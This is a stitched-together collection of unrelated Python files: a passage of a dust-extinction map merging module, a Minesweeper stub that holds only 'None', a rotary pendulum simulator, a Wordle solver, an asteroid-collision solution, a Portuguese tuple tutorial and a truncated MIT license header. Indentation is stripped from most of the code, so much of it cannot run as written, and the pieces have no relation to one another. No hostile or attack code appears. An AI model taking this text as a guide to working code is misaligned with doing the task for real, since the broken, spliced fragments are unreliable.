# predictions - like 300. So set an upper limit.
bPlanck = stackPlanck2D < planckUpperLim
planck2DMed = 0.
if np.sum(bPlanck) > 0:
planck2DMed = np.median(stackPlanck2D[bPlanck])
# If dustmaps is not on this system, then substitute in the planck
# map at the central LOS if one was supplied.
if planck2DMed < 1e-5 and planckCen is not None:
planck2DMed = np.copy(planckCen)
# find the scale factor for the Rv factor that causes L19 to line
# up with Bovy et al. along the sight line, out to our desired
# comparison distance.
# We set a default comparison point: some fraction of the maximum
# distance along this sight line for which we have the L+19 model.
distCompare = losCen.distLimPc * distFrac
# Use max distance provided by the user if required.
usemaxdist = False
if 0. <= dmaxL19 < losCen.distLimPc:
distCompare = dmaxL19
usemaxdist=True
if tellTime:
print("compareExtinctions.hybridSightline INFO - Using user provided max dist for L+19.")
elif dmaxL19 < 0: # replaced "== -1" with "<0"
# Specify that distance should not be changed by other operations
usemaxdist=True
# Do not use Lallement if Bovy has non-zero values
if ebvBovyMed.sum()!=0:
distCompare = 0
# else use the full extent of the profile
# elif dmaxL19<0:
# raise NotImplemented("The value of dmax has to be either -1 or >=0, currently {}.".format(dmaxL19))
if usemaxdist and doPlots:
ax1.axvline(distCompare,color='r',linestyle='dotted',label='dmaxL19')
# We can also try to set the decision distance dynamically. Here I
# find all the distances for which the L+19 extinction is within
# fraction "diffRatioMin" of the Bovy et al. extinction, and find
# the maximum distance for which the two sets are this close. If
# that distance is less than some cutoff ("minDistL19") then the
# dynamically estimated max distance is discarded.
if setLimDynamically and not usemaxdist:
bNear = (distsMed <= losCen.distLimPc) & \
(ebvL19Med > 0) & (ebvBovyMed > 0 ) & \
(np.abs(ebvBovyMed / ebvL19Med - 1.0) < diffRatioMin)
if np.sum(bNear) > 0:
# what minimum distance satisfied this expression?
distMinCalc = np.max(distsMed[bNear])
# Only apply the revised limit if it is farther than our
# desired minimum.
if distMinCalc > minDistL19:
distCompare = distMinCalc
# now we set our scale factor based on comparison to Bovy. Some
# regions of Bovy still produce zero E(B-V) for all distances, so
# we set a minimum (if bovy AT THE COMPARISON POINT is below our
# threshold minEBV, then we do no scaling).
rvFactor = 1. # our default: no scaling.
iMaxL19 = np.argmin(np.abs(distsMed - distCompare))
if ebvBovyMed[iMaxL19] > minEBV:
rvFactor = ebvL19Med[iMaxL19] / ebvBovyMed[iMaxL19]
# 2021-04-05 WIC - if we have the planck2d map to hand, then for
# the cases where Bovy does not seem to have coverage, scale L19
# to the median Planck value.
else:
if planck2DMed > 0. and distCompare > 0:
rvFactor = ebvL19Med[iMaxL19] / planck2DMed
RvScaled = Rv * rvFactor
### Merge the two median curves. This will be our E(B-V) curve
### with distance.
ebvHybrid = np.copy(ebvBovyMed)
b19 = distsMed < distCompare
ebvL19scaled = ebvL19Med/rvFactor
# 2021-04-07 If the user prefers to accept L+19 and extend it to
# meet bovy et al. I think it happens here - we change the meaning
# of ebvL19Scaled (to ebv19 "replaced"):
if bridgeL19 and distCompare > 0 and ebvBovyMed[iMaxL19] > minEBV:
distRight = np.min([distCompare + bridgeWidthL19, \
np.max(distsMed)])
if tellTime:
print("compareExtinctions.hybridSightline INFO - bridging L19 to bovy et al. 19 from distance %.1f - %.1f" % (distCompare, distRight))
# find the nearest values of the two extinctions to use
iLeft = np.argmin(np.abs(distsMed - distCompare))
iRight = np.argmin(np.abs(distsMed - distRight))
# Evaluate the straight line parameters that take L19 to Bovy
m, c = linkStraightline(distsMed[iLeft], distsMed[iRight], \
ebvL19Med[iLeft], ebvBovyMed[iRight])
# we re-initialize hybrid including the bridge
ebvHybrid = np.copy(ebvL19Med)
# ... apply the transformation along the bridge...
ebvHybrid[iLeft:iRight] = m*distsMed[iLeft:iRight] + c
# ... and everything to the right of the bridge is Bovy
ebvHybrid[iRight::] = ebvBovyMed[iRight::]
# Finally, we need to re-define the boolean "b19" so that it
# doesn't switch scaled L19 back in again.
b19 = np.isnan(ebvHybrid)
#ebvHybrid[b19] = ebvL19Med[b19]/rvFactor
bBovBad = ebvHybrid < minEBV
if dmaxL19==-1:
# Only use Lallement if Bovy is zero
# distCompare is non-zero if Bovy is zero, use only Lallement
if distCompare!=0:
ebvHybrid = ebvL19Med
            if np.all(bBovBad):
if tellTime:
print(("compareExtinctions.hybridSightline WARN - Values in the E(B-V) "
"Bovy profile are not larger than the requested minimum of %.2f at all distances." % (minEBV)))
# If distCompare is zero, Bovy is non-zero and will be the only profile used
else:
if distCompare>0:
ebvHybrid[b19] = ebvL19scaled[b19]
# ebvHybrid[bBovBad] = ebvL19Med[bBovBad]/rvFactor
ebvHybrid[bBovBad] = ebvL19scaled[bBovBad]
# If the user's choices have led to a profile that is zero at all
# distances, warn the user (unless the user has suppressed text
# output)
if np.all(ebvHybrid==0):
if tellTime:
print("compareExtinctions.hybridSightline WARN - The E(B-V) profile is zero at all distances!")
if tellTime:
t2 = time.time()
dtBovy = t1 - t0
dtSample = t2 - t1
dtTotal = t2 - t0
print("TIMING: setup:%.2e s, querying:%.2e s, total:%.2e s" \
% (dtBovy, dtSample, dtTotal))
# if not plotting, return
if not doPlots:
if returnValues:
return ebvHybrid, distsMed, rvFactor, distCompare
else:
return
## Now we compute the upper and lower levels for plotting. I am
## not certain if it's better to use percentiles or to use the
## standard deviation (there is a tradeoff when there are few
## samples) so both are computed for the moment.
ebvL19Std = np.std(stackL19, axis=0)
ebvL19Levs = np.percentile(stackL19, [pctLower, pctUpper],\
axis=0)
ebvBovyStd = np.std(stackBovy, axis=0)
ebvBovyLevs = np.percentile(stackBovy, [pctLower, pctUpper],\
axis=0)
# same for planck2d
ebvPlanck2DStd = np.std(stackPlanck2D)
ebvPlanck2DLevs = np.percentile(stackPlanck2D, [pctLower, pctUpper])
### Now we plot the regions of coverage to the percentile limits,
### for the bovy and for the L+19 predictions.
dumLevsL19 = ax1.fill_between(distsMed, ebvL19Levs[0], ebvL19Levs[1], \
zorder=9, alpha=0.4, color='0.5')
dumLevsBovy = ax1.fill_between(distsMed, ebvBovyLevs[0], ebvBovyLevs[1], \
zorder=9, alpha=0.3, color='r')
### Show the median levels for Bovy and for L+19
dumMedsL19 = ax1.plot(distsMed, ebvL19Med, color='k', ls='-.', \
zorder=20, lw=2, \
label=r'L19, R$_V$=%.2f' % (Rv))
dumMedsBovy = ax1.plot(distsMed, ebvBovyMed, color='r', ls='--', \
zorder=21, lw=2, label='Bovy median')
# if we have it, show the levels for planck
dumPlanckMed = ax1.axhline(planck2DMed, color='g', ls='-', lw=2, \
label='Planck 2D', alpha=0.7)
# Overplot the hybrid EBV curve
dumHybrid = ax1.plot(distsMed, ebvHybrid, ls='-', color='c', lw=6, \
label='Hybrid E(B-V)', zorder=31, alpha=0.5)
# show lallement et al. scaled up to bovy et al. at the transition
# -- IF we wanted to do the scaling...
coloScaled='b'
if not bridgeL19:
dumScal = ax1.plot(distsMed[b19], ebvL19scaled[b19], \
color=coloScaled, \
lw=2, \
ls=':', \
label=r'L19, R$_{V}$=%.2f' % (RvScaled), \
zorder=35, alpha=0.75)
dumLevsScal = ax1.fill_between(distsMed[b19], \
ebvL19Levs[0][b19]/rvFactor, \
ebvL19Levs[1][b19]/rvFactor, \
color=coloScaled, \
alpha=0.2, \
zorder=34)
#sAnno = "Green dashed: L19 w/ Rv=%.2f" % (RvScaled)
#dum = ax1.annotate(sAnno, (0.95,0.05), xycoords='axes fraction', \
# ha='right', va='bottom', color='g')
# override the axis title:
sTitle = '(lCen, bCen)=(%.2f, %.2f), NSIDE=%i. %i samples' % \
(lCen, bCen, nside, 1+len(vL))
# add the levels information
sTitle = '%s. Pct lower, upper = %.1f, %.1f' % (sTitle, pctLower, pctUpper)
ax1.set_title(sTitle)
# ok NOW we do the legend.
leg = ax1.legend(loc=0, frameon=True, facecolor='w', framealpha=1.)
# Now show these over the figure
#dumAvgL19 = ax1.errorbar(distsMed, ebvL19Med, \
# yerr=ebvL19Std, \
# ls=None, ms=5,
# zorder=20)
#dumAvgL19 = ax1.errorbar(distsMed, ebvBovyMed, \
# yerr=ebvBovyStd, \
# ls=None, ms=5,
# zorder=20)
# Show a panel giving the sight lines looked at here. We will want
# the maximum bovy extinctions for each (since that goes farther):
maxBovy = stackBovy[1::,-1] # for our colors, not including central
maxPlanck2D = stackPlanck2D[1::]
# debug - what sight lines are we looking at here?
#fig2 = plt.figure(2, figsize=(3,3))
#fig2.clf()
#ax2 = fig1.add_subplot(224)
# If we have planck2d as well as bovy, show both. Otherwise don't
# show both.
lAx = [fig1.add_subplot(gs[1,2])]
lCo = [maxBovy]
lLa = ['E(B-V), Bovy']
lGood = [np.isfinite(maxBovy)]
vmin = None
vmax = None
if np.max(stackPlanck2D) > 1e-3:
lAx.append(fig1.add_subplot(gs[0,2]))
lCo.append(maxPlanck2D)
lLa.append('E(B-V), Planck')
bPla = maxPlanck2D < planckUpperLim
        lGood.append(bPla)
ebvBoth = np.hstack(( maxBovy, maxPlanck2D[bPla] ))
vmin = np.min(ebvBoth)
vmax = np.max(ebvBoth)
for iAx in range(len(lAx)):
ax2 = lAx[iAx]
vColor = lCo[iAx]
labl = lLa[iAx]
bb = lGood[iAx]
#ax2 = fig1.add_subplot(gs[1,2])
dumCen = ax2.plot(lCen, bCen, 'm*', ms=20, zorder=1)
dumSamp = ax2.scatter(vL[bb], vB[bb], c=vColor[bb], \
zorder=5, cmap='Greys', \
edgecolor='0.5', marker='s', s=49, \
vmin=vmin, vmax=vmax)
# show sightlines that failed
if np.sum(~bb) > 0:
blah = ax2.scatter(vL[~bb], vB[~bb], c='r', \
zorder=1, alpha=0.25, \
marker='x', s=36)
cbar = fig1.colorbar(dumSamp, ax=ax2, label=labl)
ax2.set_xlabel('l, degrees')
ax2.set_ylabel('b, degrees')
ax2.grid(which='both', zorder=1, color='0.5', alpha=0.5)
ax2.set_title('Samples about %.2f, %.2f' % (lCen, bCen), \
fontsize=9)
# fig2.subplots_adjust(left=0.25, bottom=0.25)
# save the figure to disk
if len(figName) > 3:
        fig1.savefig(figName)  # savefig overwrites by default; it has no 'overwrite' keyword
if returnValues:
return ebvHybrid, distsMed, rvFactor, distCompare
def linkStraightline(xLeft=0., xRight=0., yLeft=0., yRight=0.):
"""Given (x,y) points for the left- and right-ends of a straight line,
return the coefficients of the straight line m, c from y = mx + c.
"""
if np.abs(xRight - xLeft) < 1.0e-3:
return 1., 0.
m = (yRight - yLeft) / (xRight - xLeft)
c = yLeft - m*xLeft
return m, c
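# Quick illustrative check of linkStraightline (added example, not part of the
# original module): the line through (0, 1) and (2, 5) has slope 2 and
# intercept 1, so
#
#   >>> linkStraightline(0., 2., 1., 5.)
#   (2.0, 1.0)
#
# while degenerate input (xLeft ~= xRight) falls back to (1., 0.).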
def loopSightlines(nside=64, imin=0, imax=25, \
nbins=500, nested=False, \
nl=4, nb=4, tellTime=False, \
reportInterval=100, \
fitsPath='', \
dirChunks='./ebvChunksRedo', \
fracPix=1., \
map_version='19', \
Rv=3.1, \
dmaxL19=1e6, \
bridgeL19=False, \
bridgeWidthL19 = 1000):
"""Wrapper: samples the 3D extinction hybrid model for a range of
healpixels
nside = healpix nside
imin, imax = first and last hpids to use
nbins = number of distance bins to use for each sightline
nl, nb = number of samples to use around each sight line
    reportInterval = write to disk (and/or provide screen output)
    every this many healpix
fitsPath = if >3 characters, the path to output fits file that
overrides auto-generated output path
dirChunks = if auto-generating the output path, the directory into
which the file will go. Ignored if fewer than 4 characters.
map_version = version of the L+19 map to send to the sightlines
Rv = Rv needed for the L+19 map object
---
Example call:
To loop through NSIDE=64 healpix IDs 999-1019:
compareExtinctions.loopSightlines(64, 999, 1019, reportInterval=10, nl=4, nb=4, fracPix=0.8, nbins=500)
"""
# set up the healpix quantities
npix = hp.nside2npix(nside)
print("loopSightlines INFO: nside %i, npix %i, %.3e" \
% (nside, npix, npix))
# How far through this are we going to go?
if imax < 0 or imax > npix:
imax = npix
# set imin appropriately
if imin > imax:
imin = np.max([imax - 25, 0])
print("loopSightlines WARN - supplied imax > imin. Defaulted to %i, %i" % (imin, imax))
# Number of sightlines
nSightlines = imax - imin
# let's construct a filename for this segment so we can keep track
# of them later.
if len(fitsPath) < 4:
fitsChunk = 'ebv3d_nside%i_hp%i_%i.fits' % (nside, imin, imax)
if len(dirChunks) > 3:
fitsPath = '%s/%s' % (dirChunks, fitsChunk)
if not os.access(dirChunks, os.R_OK):
                os.makedirs(dirChunks)  # makedirs returns None, so don't overwrite dirChunks with it
else:
fitsPath = fitsChunk[:]
# set up distance and E(B-V) arrays for only the ones we will be
# running. We also store the healpix IDs so that we could do this
# in pieces and then stitch them together later.
shp = (nSightlines, nbins)
# set up the arrays we'll be using
hpids = np.arange(imin, imax)
dists = np.zeros(shp)
ebvs = np.zeros(shp)
# Let's keep track of the scale factor we used to merge L19 with
# Bovy et al, as well as the distance at which the scaling was
# done:
sfacs = np.ones((nSightlines,2))
# Set up header information for the inevitable serialization. I
# think astropy has a nice way to do this, for the moment we can
# build one with a dictionary.
dMeta = {'nside':nside, 'nested':nested, \
'hpmin':imin, 'hpmax':imax, \
'nbins':nbins, 'nl':nl, 'nb':nb, \
'fracPix':fracPix}
dMeta['Rv'] = Rv
dMeta['mapvers'] = map_version
# 2021-04-05: if planck_2d is available on this system, add this
# to the header (we do not yet have any option to deactivate the
# substitution if present).
dMeta['PlanckOK'] = PLANCK_2D is not None
# 2021-04-07: Now that we have options for how we handle L19 and
# Bovy merging, pass the choices to the metadata so that it
# appears in the fits header.
dMeta['dmaxL19'] = dmaxL19
dMeta['bridgL19'] = bridgeL19
dMeta['bridgwid'] = bridgeWidthL19
# For reporting the sightlines to terminal
tStart = time.time()
# OK now loop through this. We don't want to have to redo the bovy
# initialization for each sight line, so let's initialize it here.
print ("loopSightlines - initializing Bovy...")
combined19 = mwdust.Combined19()
# We also initialize the Lallement+19 map object
print("loopSightlines - initializing L19...")
l19 = stilism_local.LallementDustMap(version=map_version,Rv=Rv)
print("loopSightlines - starting loops:")
for iHP in range(np.size(hpids)):
ebvsThis, distsThis, \
rvFactor, distCompare \
= hybridSightline(0., 0., \
nl=nl, nb=nb, \
setLimDynamically=False, \
useTwoBinnings=True, \
nBinsAllSightlines=nbins, \
Rv=Rv, \
pixFillFac=fracPix, \
nested=nested, \
nside=nside, \
objBovy=combined19, \
objL19=l19, \
doPlots=False, \
tellTime=tellTime, \
dmaxL19=dmaxL19, \
bridgeL19=bridgeL19, \
bridgeWidthL19=bridgeWidthL19, \
returnValues=True, \
hpid=hpids[iHP])
# now put the results into the master arrays by row number
# (which is why we loop through the length of the hp array and
# not the hpids themselves):
dists[iHP] = distsThis
ebvs[iHP] = ebvsThis
sfacs[iHP][0] = rvFactor
sfacs[iHP][1] = distCompare
# Write to disk every so often
if iHP >= reportInterval and iHP % reportInterval < 1:
writeExtmap(hpids, dists, ebvs, sfacs, \
dMeta=dMeta, \
fitsPath=fitsPath)
print("loopSightlines INFO: %i of %i: hpid %i: %.2e s" \
% (iHP, nSightlines, hpids[iHP], time.time()-tStart))
# use our method to write to disk
writeExtmap(hpids, dists, ebvs, sfacs, \
dMeta=dMeta, \
fitsPath=fitsPath)
def writeExtmap(hpids=np.array([]), dists=np.array([]), \
ebvs=np.array([]), sfacs=np.array([]), \
masks=np.array([]), \
dMeta={}, header=None, fitsPath='test.fits'):
"""Writes extinction map segment to fits. HDUs are, in this order:
hpids, distance bins, E(B-V)s, scale factors = data arrays to write
masks = optional boolean mask array
dMeta = dictionary of metadata keywords to pass
header = template header to send to the primary HDU
fitsPath = filename for output file"""
if np.size(hpids) < 1:
return
# Generate primary header, accepting template header if given
hdu0 = fits.PrimaryHDU(hpids, header=header)
for sKey in dMeta.keys():
hdu0.header[sKey] = dMeta[sKey]
# ... then the secondary arrays, which we will serialize as image hdus:
hdul = fits.HDUList([hdu0])
# now we append them
for thisArr in [dists, ebvs, sfacs, masks]:
hdul.append(fits.ImageHDU(thisArr))
hdul.writeto(fitsPath, overwrite=True)
# close the hdulist
hdul.close()
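# Illustrative read-back sketch (added example, not part of the original
# module), mirroring the HDU order documented in writeExtmap above
# (primary=hpids, then dists, ebvs, sfacs, optional masks):
#
#   >>> hdul = fits.open('test.fits')
#   >>> hpids, dists, ebvs, sfacs = (hdul[i].data for i in range(4))
#   >>> nside = hdul[0].header['NSIDE']   # metadata passed in via dMeta
#   >>> hdul.close()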
def mergeMaps(sSrch='ebv3d_nside64_*fits', \
pathJoined='merged_ebv3d_nside64.fits'):
"""Given partial healpix maps, merge them into a single all-sky hp
map. A list of paths matching the search string is constructed, and
the all-sky map constructed by slotting in the populated rows from the
individual files.
"""
lPaths = glob.glob(sSrch)
if len(lPaths) < 1:
print("mergeMaps WARN - no paths match string %s" % (sSrch))
return
# ensure the output file doesn't overwrite any of the input files
if len(pathJoined) < 4:
pathJoined = 'test_mergedmaps.fits'
# if the joined path is in the path of files, remove it from the
# list to consider and prepend "tmp_" to the output path. This
# should guard against any overwriting of input files.
if pathJoined in lPaths:
print("mergeMaps INFO - output path %s already in input path list. Removing from input path list and using a different output path." % (pathJoined))
lPaths.remove(pathJoined)
pathJoined = 'tmp_%s' % (os.path.split(pathJoined)[-1])
# read the healpix info from the header of the first file in the
# list. For the moment we trust the header rather than
# constructing this information from the input data.
hdr0 = fits.getheader(lPaths[0])
try:
nested = hdr0['NESTED']
nside = hdr0['NSIDE']
nbins = hdr0['NBINS']
except:
print("mergeMaps WARN - problem reading header keywords from %s" \
% (lPaths[0]))
return
# Now we construct our master arrays.
npix = hp.nside2npix(nside)
# hpid, distance, ebvs, and a mask array. The mask array follows
# np.masked convention that the mask is FALSE for GOOD points.
hpidsMaster = np.arange(npix)
distsMaster = np.zeros((npix, nbins))
ebvsMaster = np.zeros((npix, nbins))
sfacsMaster = np.zeros((npix, 2))
maskMaster = np.ones((npix, nbins), dtype='uint')
# OK now we slot in the various pieces
for path in lPaths:
hdul = fits.open(path)
rowsThis = hdul[0].data
distsMaster[rowsThis] = hdul[1].data
ebvsMaster[rowsThis] = hdul[2].data
sfacsMaster[rowsThis] = hdul[3].data
# This is a little clunky, since we're allowing for the
# possibility that the input data might or might not have mask
# data written, and that mask data may or may not be zero
# sized.
hasMask = False
if len(hdul) > 4:
if np.size(hdul[4].data) > 0:
maskMaster[rowsThis] = hdul[4].data
hasMask = True
if not hasMask:
maskMaster[rowsThis, :] = 0
# Close the hdulist before moving on
hdul.close()
# now we have our combined arrays and template header. Write them!
# (2021-04-07 now not with the mask, since I don't think I know
# how it will be used...)
writeExtmap(hpidsMaster, distsMaster, ebvsMaster, sfacsMaster, \
header=hdr0, \
fitsPath=pathJoined)
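# Illustrative usage sketch (added example, not part of the original module):
# merging the per-chunk files produced by loopSightlines into one all-sky map,
# using the default search pattern and output path of mergeMaps:
#
#   >>> mergeMaps(sSrch='ebv3d_nside64_*fits', \
#   ...           pathJoined='merged_ebv3d_nside64.fits')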
|
#
# @lc app=leetcode.cn id=529 lang=python3
#
# [529] minesweeper
#
None
# @lc code=end
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import numpy as np
import math
# Motor
Rm = 8.4 # Resistance
kt = 0.042 # Current-torque (N-m/A)
km = 0.042 # Back-emf constant (V-s/rad)
# Rotary Arm
mr = 0.095 # Mass (kg)
Lr = 0.085 # Total length (m)
Jr = mr * Lr**2 / 12 # Moment of inertia about pivot (kg-m^2)
Dr = 0.0015 # Equivalent viscous damping coefficient (N-m-s/rad)
# Pendulum Link
mp = 0.024 # Mass (kg)
Lp = 0.129 # Total length (m)
Jp = mp * Lp**2 / 12 # Moment of inertia about pivot (kg-m^2)
Dp = 0.0005 # Equivalent viscous damping coefficient (N-m-s/rad)
g = 9.81 # Gravity constant
# Encoders
enc_discretization = 2048 # Encoder resolution
def forward_model(theta, alpha, theta_dot, alpha_dot, Vm, dt, euler_steps):
dt /= euler_steps
for step in range(euler_steps):
tau = (km * (Vm - km * theta_dot)) / Rm # torque
theta_dot_dot = -(
Lp * Lr * mp *
(8.0 * Dp * alpha_dot - Lp**2 * mp * theta_dot**2 * math.sin(
2.0 * alpha) + 4.0 * Lp * g * mp * math.sin(alpha)) *
math.cos(alpha) + (4.0 * Jp + Lp**2 * mp) *
(4.0 * Dr * theta_dot +
Lp**2 * alpha_dot * mp * theta_dot * math.sin(2.0 * alpha) +
2.0 * Lp * Lr * alpha_dot**2 * mp * math.sin(alpha) - 4.0 * tau)) / (
4.0 * Lp**2 * Lr**2 * mp**2 * math.cos(alpha)**2 +
(4.0 * Jp + Lp**2 * mp) *
(4.0 * Jr + Lp**2 * mp * math.sin(alpha)**2 + 4.0 * Lr**2 * mp))
alpha_dot_dot = (
4.0 * Lp * Lr * mp *
(2.0 * Dr * theta_dot + 0.5 * Lp**2 * alpha_dot * mp * theta_dot *
math.sin(2.0 * alpha) + Lp * Lr * alpha_dot**2 * mp * math.sin(alpha)
- 2.0 * tau) * math.cos(alpha) -
(4.0 * Jr + Lp**2 * mp * math.sin(alpha)**2 + 4.0 * Lr**2 * mp) *
(4.0 * Dp * alpha_dot - 0.5 * Lp**2 * mp * theta_dot**2 *
math.sin(2.0 * alpha) + 2.0 * Lp * g * mp * math.sin(alpha))) / (
4.0 * Lp**2 * Lr**2 * mp**2 * math.cos(alpha)**2 +
(4.0 * Jp + Lp**2 * mp) *
(4.0 * Jr + Lp**2 * mp * math.sin(alpha)**2 + 4.0 * Lr**2 * mp))
theta_dot += theta_dot_dot * dt
alpha_dot += alpha_dot_dot * dt
theta += theta_dot * dt
alpha += alpha_dot * dt
theta %= (2 * math.pi)
alpha %= (2 * math.pi)
return theta, alpha, theta_dot, alpha_dot
# Use numba if installed
try:
import numba
forward_model = numba.jit(forward_model)
except:
print('Warning: Install \'numba\' for faster simulation.')
class QubeServo2Simulator(object):
'''Simulator that has the same interface as the hardware wrapper.'''
def __init__(self,
safe_operating_voltage=8.0,
euler_steps=1,
frequency=1000):
self._time_step = 1.0 / frequency
self._euler_steps = euler_steps
self.state = [0, 0, 0, 0]
self.encoders = [0, 0]
self.unnormalized_angles = [self.state[0], self.state[1]]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
def reset_encoders(self):
pass
def action(self, action):
self.state = forward_model(
*self.state,
action,
self._time_step,
self._euler_steps)
self.unnormalized_angles[0] += self.state[2] * self._time_step
self.unnormalized_angles[1] += self.state[3] * self._time_step
self.encoders[0] = int(self.unnormalized_angles[0] * (-enc_discretization / (2.0 * np.pi)))
self.encoders[1] = int(self.unnormalized_angles[1] * (enc_discretization / (2.0 * np.pi)))
currents = [action / 8.4] # 8.4 is resistance
others = [0.] #[tach0, other_stuff]
return currents, self.encoders, others
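# Illustrative usage sketch (added example): step the simulator open-loop with
# a constant motor voltage. Only numpy/math are required; numba is optional.
if __name__ == '__main__':
    with QubeServo2Simulator(frequency=1000) as sim:
        for _ in range(100):
            currents, encoders, _ = sim.action(1.0)  # 1.0 V command per 1 ms step
        print('state (theta, alpha, theta_dot, alpha_dot):', sim.state)
        print('encoder counts (theta, alpha):', encoders)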
|
import queue
import copy
from english_words import english_words_set
ENGLISH_CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
dictionary_search = True
guesses = [
"PANTS",
"FJORD",
"CHEWY"
]
scores = [
"BBGGB",
"BBYBB",
"BYBBB"
]
def input_validation(guesses, scores):
if len(guesses) != len(scores):
raise ValueError(f"the tries and scores need to have the same length. Got tries: {len(guesses)} and scores: {len(scores)}")
for guess, score in zip(guesses, scores):
if len(guess) != 5:
raise ValueError(f"the length of guess needs to be 5. {guess} is not length of 5")
if len(score) != 5:
raise ValueError(f"the length of guess needs to be 5. {score} is not length of 5")
def convert_to_loc_limitation(guesses,scores):
options = [set(ENGLISH_CHARS) for i in range(5)]
# all letters that need to be used but we don't know the location of
need_to_use = set()
for guess, score in zip(guesses, scores):
for char, sc, ind in zip(guess, score, range(5)):
if sc == "G":
if char not in options[ind]:
raise RuntimeError("There is contradiction somewhere.")
options[ind] = set(char)
# there are edge cases where multiple of the same characters exist in a word
need_to_use.discard(char)
if sc == "Y":
options[ind].discard(char)
need_to_use.add(char)
if sc == "B":
if char in need_to_use:
raise RuntimeError("There is a contradiction")
for op in options:
op.discard(char)
return options, need_to_use
def get_known_chars(known_non_locs):
return None
input_validation(guesses, scores)
options, need_to_use = convert_to_loc_limitation(guesses, scores)
que = queue.Queue()
for char in options[0]:
next_need_to_use = copy.copy(need_to_use)
next_need_to_use.discard(char)
que.put([char, copy.copy(next_need_to_use)])
while not que.empty():
word, need_to_use = que.get()
if len(word) == 5:
if dictionary_search:
if word.lower() in english_words_set:
print(word)
else:
print(word)
else:
option = options[len(word)]
for next_char in option:
if next_char in need_to_use:
next_need_to_use = copy.copy(need_to_use)
next_need_to_use.remove(next_char)
que.put([word+next_char, next_need_to_use])
else:
if len(need_to_use) + len(word) < 5:
que.put([word+next_char, copy.copy(need_to_use)])
print("DONE")
|
#!/usr/bin/python3
"""
We are given an array asteroids of integers representing asteroids in a row.
For each asteroid, the absolute value represents its size, and the sign
represents its direction (positive meaning right, negative meaning left). Each
asteroid moves at the same speed.
Find out the state of the asteroids after all collisions. If two asteroids meet,
the smaller one will explode. If both are the same size, both will explode. Two
asteroids moving in the same direction will never meet.
Example 1:
Input:
asteroids = [5, 10, -5]
Output: [5, 10]
Explanation:
The 10 and -5 collide resulting in 10. The 5 and 10 never collide.
Example 2:
Input:
asteroids = [8, -8]
Output: []
Explanation:
The 8 and -8 collide exploding each other.
Example 3:
Input:
asteroids = [10, 2, -5]
Output: [10]
Explanation:
The 2 and -5 collide resulting in -5. The 10 and -5 collide resulting in 10.
Example 4:
Input:
asteroids = [-2, -1, 1, 2]
Output: [-2, -1, 1, 2]
Explanation:
The -2 and -1 are moving left, while the 1 and 2 are moving right.
Asteroids moving the same direction never meet, so no asteroids will meet each
other.
Note:
The length of asteroids will be at most 10000.
Each asteroid will be a non-zero integer in the range [-1000, 1000]..
"""
from typing import List
class Solution:
def asteroidCollision(self, asteroids: List[int]) -> List[int]:
"""
simplified
while-else: break statement break the entire while-else block
for-else: break statement break the entire for-else block
stack from left to right, only -> <- will pop the stack
"""
stk = []
for e in asteroids:
while stk and e < 0 < stk[-1]:
if abs(e) > abs(stk[-1]):
# -> exploded, <- continues
stk.pop()
elif abs(e) == abs(stk[-1]):
# -> <- both exploded
stk.pop()
break
else:
# <- exploded, -> continue
break
else:
stk.append(e)
return stk
def asteroidCollision_complex(self, asteroids: List[int]) -> List[int]:
"""
asteroids same speed
list of size
stk of index
only -> <- will collide
"""
stk = []
n = len(asteroids)
for i in range(n-1, -1, -1):
cur = asteroids[i]
while stk and asteroids[stk[-1]] < 0 and cur > 0 and abs(asteroids[stk[-1]]) < abs(cur):
stk.pop()
if stk and cur > 0 and asteroids[stk[-1]] == -cur:
stk.pop()
continue
if not stk:
stk.append(i)
continue
if not (asteroids[stk[-1]] < 0 and cur > 0) or abs(cur) > abs(asteroids[stk[-1]]):
stk.append(i)
return [
asteroids[i]
for i in stk[::-1]
]
if __name__ == "__main__":
assert Solution().asteroidCollision([10, 2, -5]) == [10]
assert Solution().asteroidCollision([5, 10, -5]) == [5, 10]
assert Solution().asteroidCollision([8, -8]) == []
|
lanche = ('Hamburguer', 'Suco', 'Pizza', 'Pudim')
#print(lanche[1:3]) # will only print Suco and Pizza
#lanche = ('Hamburguer', 'Suco', 'Pizza', 'Pudim')
#for comida in lanche:
#    print(f'Eu vou comer {comida}')
#print('-'*30)
#
#for cont in range (0, len(lanche)):
#    print(f'Eu vou comer {lanche[cont]} na posicao {cont}')
#print('-'*30)
#
#for pos, comida in enumerate (lanche):
#    print(f'Eu vou comer {comida} na posicao {pos}')
#print('-'*30)
#print('Comi pra caramba!!!!')
#lanche = ('Hamburguer', 'Suco', 'Pizza', 'Pudim')
#print(sorted(lanche)) # to print the items in sorted order
#a = (2, 5, 4)
#b = (5, 8, 1, 2)
#c = a + b # concatenate the tuples
#print(c)
#
#a = (2, 5, 4)
#b = (5, 8, 1, 2)
#c = a + b # concatenate the tuples
#print(len(c))
#
#a = (2, 5, 4)
#b = (5, 8, 1, 2)
#c = a + b # concatenate the tuples
#print(c.count(5)) # count how many 5s there are in the tuples
#
#a = (2, 5, 4)
#b = (5, 8, 1, 2)
#c = a + b # concatenate the tuples
#print(c)
#print(c.index(8)) # at which index the number 8 is
#
#a = (2, 5, 4)
#b = (5, 8, 1, 2)
#c = a + b # concatenate the tuples
#print(c)
#print(c.index(2)) # index of the number 2; since 2 appears twice, the first occurrence is returned
#pessoa = ('Gustavo', 39, 'M', 99.88) # a tuple can hold items of different types
#print(pessoa)
pessoa = ('Gustavo', 39, 'M', 99.88) # a tuple can hold items of different types
del pessoa # delete the tuple; the name 'pessoa' no longer exists after this
try:
    print(pessoa)
except NameError:
    # accessing a deleted name raises NameError
    print('pessoa was deleted and can no longer be printed')
|
# coding: utf8
# The MIT License (MIT)
#
# Copyright (c) 2018 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
